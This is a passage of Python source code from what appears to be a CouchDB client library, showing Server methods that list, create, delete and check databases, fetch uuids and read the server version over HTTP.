        name = db_or_name
        if isinstance(db_or_name, Database):
            name = db_or_name.name
        request = self.session.head(self.host + "/" + name)
        if request.status_code == 404:
            return False
        return True

    def __iter__(self):
        """ Iterates over all the databases and returns Database instances """
        return (Database(name, server=self) for name in self.get_databases())

    def uuids(self, count=1):
        """ Returns a list of "count" uuids generated by the server """
        request = self.session.get(self.host + "/_uuids",
                                   params={"count": count})
        return request.json()["uuids"]

    def get_databases(self):
        """Return the list of database names on the server."""
        request = self.session.get(self.host + "/_all_dbs")
        return request.json()

    def version(self):
        """Return the server version string from the welcome document."""
        request = self.session.get(self.host)
        return request.json()["version"]

    def create_db(self, name):
        """ Try to create a new database or raise error

        Possible Errors: DBExists, AuthFail
        """
        return Database(name, server=self, create=True)

    def delete_db(self, db_or_name):
        """ Try to delete database or raise error

        Possible Errors: DBNotExists, AuthFail
        """
        name = db_or_name
        if isinstance(db_or_name, Database):
            name = db_or_name.name
        request = self.session.delete(self.host + "/" + name)
        if not request.ok:
            if request.status_code == 401:
                raise excepts.AuthFail
            elif request.status_code == 404:
                raise excepts.DBNotExists
            # Unmapped status codes still surface as a generic failure.
            raise Exception(request.status_code)